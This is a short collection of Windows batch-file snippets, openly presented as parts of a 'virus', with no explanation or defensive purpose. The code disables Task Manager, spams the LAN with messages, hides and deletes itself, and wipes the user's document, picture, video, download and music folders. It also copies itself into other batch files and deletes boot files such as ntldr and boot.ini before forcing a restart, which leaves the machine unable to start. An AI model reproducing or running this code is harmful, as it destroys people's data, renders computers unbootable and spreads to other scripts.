1.Disable Task Manager
2.LAN Spam
3.Hide after run
4.Self Destruct the BAT file
5.User Specific Deletion
6.Replace other BAT files with the virus
7.Change homepage
8.Speak text
9.No restart
10.Disk tray loop
@echo off
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
2.LAN Spam
@echo off
net start "messenger"
:A
net send * "write text"
net send * "write text"
net send * "write text"
net send * "write text"
net send * "write text"
goto A
3.Hide after run
@echo ogg
attrib +h %0
4.Self Destruct the BAT file
@echo off
del /f /q %0
5.User Specific Deletion
@echo off
DEL /F /Q %UserProfile%\Documents\*.* >nul
DEL /F /Q %UserProfile%\Pictures\*.* >nul
DEL /F /Q %UserProfile%\Videos\*.* >nul
DEL /F /Q %UserProfile%\Downloads\*.* >nul
DEL /F /Q %UserProfile%\Music\*.* >nul
6.Replace other BAT files with the virus
@echo off
%0 >>other.bat
7.Change homepage
@echo off
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "START PAGE" /d "http://www.google.com"
8.Speak text
@echo off
echo Set Speech = CreateObject("SAPI.SpVoice") >> speak.vbs"
echo Speech.Speak "insert text to speach here" >> speak.vbs
start speak.vbs"
9.No restart
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
shutdown /r /t 00
10.Disk tray loop
@echo off
echo Do >> "opendisk.vbs"
echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs"
echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
echo Loop >> "opendisk.vbs"
start "" "opendisk.vbs"